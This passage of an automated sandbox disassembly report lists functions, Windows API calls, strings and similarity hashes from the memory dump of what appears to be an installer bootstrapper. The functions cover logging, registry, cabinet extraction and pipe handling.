Instruction Fuzzy Hash: 9B41F6B6D05319AFCB15DF99D8859EEBBF8EF48710F10412AF914E7340E770A9418BA4

Function 00100523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0012B5FC,00000000,?,?,?,000D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,000C54FA,?), ref: 00100533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0012B5F4,?,000D4207,00000000,Setup), ref: 001005D7
GetLastError.KERNEL32(?,000D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,000C54FA,?,?,?), ref: 001005E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,000D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,000C54FA,?), ref: 00100621

Part of subcall function 000C2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 000C2F09

LeaveCriticalSection.KERNEL32(0012B5FC,?,?,0012B5F4,?,000D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,000C54FA,?), ref: 0010067A

Strings

logutil.cpp, xrefs: 00100606

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: d69793309b74c9572613e4112226a7f19db78ea4e7206b5d0a7fa028fd0496ea
Instruction ID: 96f0ebca0b1666e25fda72dea67a16456daa37e2df402096b005ff01c7091d33
Opcode Fuzzy Hash: d69793309b74c9572613e4112226a7f19db78ea4e7206b5d0a7fa028fd0496ea
Instruction Fuzzy Hash: F131C631904629FBDB225F609D85FAE7769FF08750F054124F981AB1E1D7B2CDA09B90

Function 0010159E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 001015DA
lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0010163C
lstrlenW.KERNEL32(?), ref: 00101648
RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0010168B

Strings

regutil.cpp, xrefs: 001016B3
BundleUpgradeCode, xrefs: 001015A7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen$Value
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1648651458
Opcode ID: e73a968bb7f1c882e935bbd1330f79f694b9b23da11f575acef686e416b50f63
Instruction ID: 928e4359652039d3e0f2170f6299dfb378379b7e4f3311d73ddf2946e4d7ea3c
Opcode Fuzzy Hash: e73a968bb7f1c882e935bbd1330f79f694b9b23da11f575acef686e416b50f63
Instruction Fuzzy Hash: 33417172900229BFCB219F949C81AAEBBB9FB44750F050159FD51AB251C7B5DD118BA0

Function 000E398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000E39F4

Strings

Failed to append property string part., xrefs: 000E3A68
Failed to escape string., xrefs: 000E3A76
%s%="%s", xrefs: 000E3A27
Failed to format property value., xrefs: 000E3A7D
Failed to format property string part., xrefs: 000E3A6F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: 64ced67be793ae7aafd539823c757aadbb61fb652664dbac7ccced98a3f96d1a
Instruction ID: 3e7b74d9b36dc85ebbb5f418dd4b44866ee31cf1007bb994779bcadfdf4f0b45
Opcode Fuzzy Hash: 64ced67be793ae7aafd539823c757aadbb61fb652664dbac7ccced98a3f96d1a
Instruction Fuzzy Hash: 21319232904259AFCB159F99CC4AEEEBBA8AF00710F14426AF81177252D7719F50DB91

Function 001041E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0010432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,000DA063,00000001), ref: 00104203
GetLastError.KERNEL32(00000002,?,0010432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,000DA063,00000001,000007D0,00000001,00000001,00000003), ref: 00104212
MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0010432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,000DA063,00000001), ref: 001042A6
GetLastError.KERNEL32(?,0010432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,000DA063,00000001,000007D0,00000001), ref: 001042B0

Part of subcall function 00104440: FindFirstFileW.KERNEL32(000E923A,?,00000100,00000000,00000000), ref: 0010447B
Part of subcall function 00104440: FindClose.KERNEL32(00000000), ref: 00104487

Strings

\, xrefs: 00104265
fileutil.cpp, xrefs: 001042CF

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorFindLastMove$CloseFirst
String ID: \$fileutil.cpp
API String ID: 3479031965-1689471480
Opcode ID: bad69a04a45e2531f9ea40120a9d8110f288ead6e973b2459e069c5aadd40ee3
Instruction ID: 275af850d4fcaba0bfaff3513c617bccdc22c3517373bfc7ca1e984096d2589b
Opcode Fuzzy Hash: bad69a04a45e2531f9ea40120a9d8110f288ead6e973b2459e069c5aadd40ee3
Instruction Fuzzy Hash: 5A31E5B6B012369BDB219E95ECC0A6F7669FF51760B124039FEC49B690D7F08C40C6D0

Function 000C732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,000C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 000C733E
LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,000C5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 000C741D

Strings

Failed to get value as string for variable: %ls, xrefs: 000C740C
Failed to get variable: %ls, xrefs: 000C737F
Failed to format value '%ls' of variable: %ls, xrefs: 000C73E7
Failed to get unformatted string., xrefs: 000C73AE
*****, xrefs: 000C73D9, 000C73E6

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-2873099529
Opcode ID: 1f32c02fdbdd751b4c675ea35d0fcfc31205ede0949d236faa615a9553e58f10
Instruction ID: cf9845f2f6475e899ca2a8518118be9e7f8edc5eb798d7431e4f0b3ca74c7f54
Opcode Fuzzy Hash: 1f32c02fdbdd751b4c675ea35d0fcfc31205ede0949d236faa615a9553e58f10
Instruction Fuzzy Hash: CC316F3290855AFBDF225F90CC05F9E7B64FF14361F108269F80866191D7B1AA909FD4

Function 000D8DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 000D8E37
GetLastError.KERNEL32 ref: 000D8E41
SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 000D8EA1

Strings

Failed to initialize ACL., xrefs: 000D8E6F
Failed to allocate administrator SID., xrefs: 000D8E1D
cache.cpp, xrefs: 000D8E65

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: efbb0e14d2a27abb9d992ff59641a97ee91bcc7a38d9a2a46155009fbbd40074
Instruction ID: d8f42dd3833d957191113bc34e57a0090beeaa9acdc753953290d7f241107e8a
Opcode Fuzzy Hash: efbb0e14d2a27abb9d992ff59641a97ee91bcc7a38d9a2a46155009fbbd40074
Instruction Fuzzy Hash: DA21D832E44314B7DB219A959C85F9FB77DEB04B10F51C06AB944FB380DB719D008BA0

Function 000C4212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,000D4028,00000001,feclient.dll,?,00000000,?,?,?,000C4B12), ref: 000C424D
GetLastError.KERNEL32(?,?,000D4028,00000001,feclient.dll,?,00000000,?,?,?,000C4B12,?,?,0010B488,?,00000001), ref: 000C4259
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,000D4028,00000001,feclient.dll,?,00000000,?,?,?,000C4B12,?), ref: 000C4294
GetLastError.KERNEL32(?,?,000D4028,00000001,feclient.dll,?,00000000,?,?,?,000C4B12,?,?,0010B488,?,00000001), ref: 000C429E

Strings

dirutil.cpp, xrefs: 000C42C2
crypt32.dll, xrefs: 000C4216

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: crypt32.dll$dirutil.cpp
API String ID: 152501406-1104880720
Opcode ID: 587ee2f3597f45ba11c06e9e495682fb17a3bda6e04eeb48afea679d523db348
Instruction ID: 606412956a600a0420467b06b19f27a0e6c1cacb51f0c61da882be5eaf1fb13e
Opcode Fuzzy Hash: 587ee2f3597f45ba11c06e9e495682fb17a3bda6e04eeb48afea679d523db348
Instruction Fuzzy Hash: 0C11A577E01637AB97215BD98896F5FBAA8FF05760751012DBD40E7251E761DC0086E0

Function 000E0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 000E0BDE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000E0BFD
GetLastError.KERNEL32 ref: 000E0C07

Strings

Failed to write during cabinet extraction., xrefs: 000E0C35
Unexpected call to CabWrite()., xrefs: 000E0BC1
cabextract.cpp, xrefs: 000E0C2B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 7b5b244bf85ca9801530a288d68bafdb5e1751be6789402beb1953a8c9732c82
Instruction ID: 1be7bc69a62a7214420a08bb66d355212362d3cac80d38a796808b4ba8c33c42
Opcode Fuzzy Hash: 7b5b244bf85ca9801530a288d68bafdb5e1751be6789402beb1953a8c9732c82
Instruction Fuzzy Hash: 4A21FF76504205AFCB14CF5ED881D9A3BB8FF88320B214159FE14E7246E7B2E9808B60

Function 000C9AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000C9AFB
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,000CA8B4,00000100,000002C0,000002C0,00000100), ref: 000C9B10
GetLastError.KERNEL32(?,000CA8B4,00000100,000002C0,000002C0,00000100), ref: 000C9B1B

Strings

Failed while searching directory search: %ls, for path: %ls, xrefs: 000C9B54
Failed to set variable., xrefs: 000C9B7A
Failed to format variable string., xrefs: 000C9B06

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: a2e74bd9054ab093210e909da5f91410a940fc83869c58b9167307d52de2ab8f
Instruction ID: 001b6de765fe5bdf3313daebee3fda0357a0b2a05c5aeb970a3cc7e67c4525d2
Opcode Fuzzy Hash: a2e74bd9054ab093210e909da5f91410a940fc83869c58b9167307d52de2ab8f
Instruction Fuzzy Hash: D111E932940535FBDB221798AE8AFAEF668EF10760F104319FD50761D1C7725D50A6D4

Function 000E0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 000E0CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000E0CD6
SetFileTime.KERNEL32(?,?,?,?), ref: 000E0CE9
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000E08B1,?,?), ref: 000E0CF8

Strings

cabextract.cpp, xrefs: 000E0C93
Invalid operation for this state., xrefs: 000E0C9D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: 1816308460211f9b903b6b5a788c55787d0d7c961a53ab05212d4e24a9ea7290
Instruction ID: 6acd4a23a469b9ef54fc8519af6d3677857f0c816770c4b27265ae52ea7125f7
Opcode Fuzzy Hash: 1816308460211f9b903b6b5a788c55787d0d7c961a53ab05212d4e24a9ea7290
Instruction Fuzzy Hash: 0D21F372804219AFCB109FA9CC499FEBBBCFF04320B508216F855E6590D3B0E991CB90

Function 000D4A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,000D539D), ref: 000D4AC3

Strings

pipe.cpp, xrefs: 000D4AFB
Failed to allocate message to write., xrefs: 000D4AA2
crypt32.dll, xrefs: 000D4A7D
Failed to write message type to pipe., xrefs: 000D4B05

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
API String ID: 3934441357-606776022
Opcode ID: effaa17cd9a8590c41bb8ed69c9cae21266d6d32bb462d290f4f156b96dde9fc
Instruction ID: b20b9bbacb27cc6fa465a1a9cbb5d3703a09d107b1f7cf1f515f91d46944804b
Opcode Fuzzy Hash: effaa17cd9a8590c41bb8ed69c9cae21266d6d32bb462d290f4f156b96dde9fc
Instruction Fuzzy Hash: 6011AC72A80229BBCB25CF98DD05EDF7BA8EF40760F114066FD00B6250EB719E50D6B5

Function 000D4642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

_memcpy_s.LIBCMT ref: 000D4693
_memcpy_s.LIBCMT ref: 000D46A6
_memcpy_s.LIBCMT ref: 000D46C1

Strings

feclient.dll, xrefs: 000D465B, 000D4691
pipe.cpp, xrefs: 000D4672
Failed to allocate memory for message., xrefs: 000D467C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
API String ID: 886498622-766083570
Opcode ID: 114030a4871c10d72a2f840368cb68e47663a7a863aac0d100e2fb5bac3d1e22
Instruction ID: f60d28a01355535f0cad16d0b10fcbd125c93fdceb949c8d1555460484b5f0ef
Opcode Fuzzy Hash: 114030a4871c10d72a2f840368cb68e47663a7a863aac0d100e2fb5bac3d1e22
Instruction Fuzzy Hash: A711A3B251030AABDB01EF94CC82DDB77ACEF05B10B00452AFA11DB142D771EA54C7E1

Function 000C45ED Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 000C4617
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000C461E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000C4628
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000C4678
GetLastError.KERNEL32 ref: 000C4682
CloseHandle.KERNEL32(?), ref: 000C477D

Strings

Failed to get process token., xrefs: 000C4656
engine.cpp, xrefs: 000C464C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
String ID: Failed to get process token.$engine.cpp
API String ID: 4232854991-1789768409
Opcode ID: 4097c060a2d358e99b97959714de234dbc2f51e326944abbc80c4d975756bd78
Instruction ID: 57676a3e005b5c180cb229cfcd5f313ac6f545ca21a7e5c0fc4ecae29c431985
Opcode Fuzzy Hash: 4097c060a2d358e99b97959714de234dbc2f51e326944abbc80c4d975756bd78
Instruction Fuzzy Hash: 8C01C432A04219ABDB109FA5DC86EAFBBB4FB05710F11012DFA41F7291DB714D4486D1

Function 000C67AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 000C67E3
GetLastError.KERNEL32 ref: 000C67ED

Strings

variable.cpp, xrefs: 000C6811
Failed to get temp path., xrefs: 000C681B
4Mw, xrefs: 000C67E3
Failed to set variant value., xrefs: 000C6837

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastPathTemp
String ID: 4Mw$Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 1238063741-4272026285
Opcode ID: 17e078656bb7212a54910b598337d3bf11770bc5a1951505993dcd8a6d325e86
Instruction ID: d3b32b885ff991c3a5f841da3ed214165f5e9a6211da46ebe731f8c184afb838
Opcode Fuzzy Hash: 17e078656bb7212a54910b598337d3bf11770bc5a1951505993dcd8a6d325e86
Instruction Fuzzy Hash: 7201D672E412396BD730A7549C06FAE77A89F04B10F104269FD44FB2C2EFA29D488AD5

Function 001096CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

KERNEL32.DLL, xrefs: 001096E7
ReleaseSRWLockExclusive, xrefs: 0010970C
AcquireSRWLockExclusive, xrefs: 001096FC

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: ad12d274e31ccd2a5b78274b1e5d9a88552c9a8e6f4702619569f2704861be97
Instruction ID: d98dcad1e5ad00aec6b628512da913c87ad280820d71c9a33d83977b228fdf47
Opcode Fuzzy Hash: ad12d274e31ccd2a5b78274b1e5d9a88552c9a8e6f4702619569f2704861be97
Instruction Fuzzy Hash: 7F01F47269A2325BCF300E656CF09A733984B0239131080BAE4F2D35C2EBD2C8959A90

Function 00100ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,000C5EB2,00000000), ref: 00100AE0
GetProcAddress.KERNEL32(00000000), ref: 00100AE7
GetLastError.KERNEL32(?,?,?,000C5EB2,00000000), ref: 00100AFE

Strings

kernel32, xrefs: 00100AD8
IsWow64Process, xrefs: 00100AD1
procutil.cpp, xrefs: 00100B1F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: 4b0aa46228838505d6d8e2639d98fedc8d26b1e3b214ae937ac2676e06853288
Instruction ID: 73bd33d928c12497b159b4006492cf7acd5ac27b136777d5aea40008761d9e96
Opcode Fuzzy Hash: 4b0aa46228838505d6d8e2639d98fedc8d26b1e3b214ae937ac2676e06853288
Instruction Fuzzy Hash: 3AF0C876E4423AA7C7259B959C49E9FBB68EF04B90F014154BD44A72C0EBF0DE00C7D0

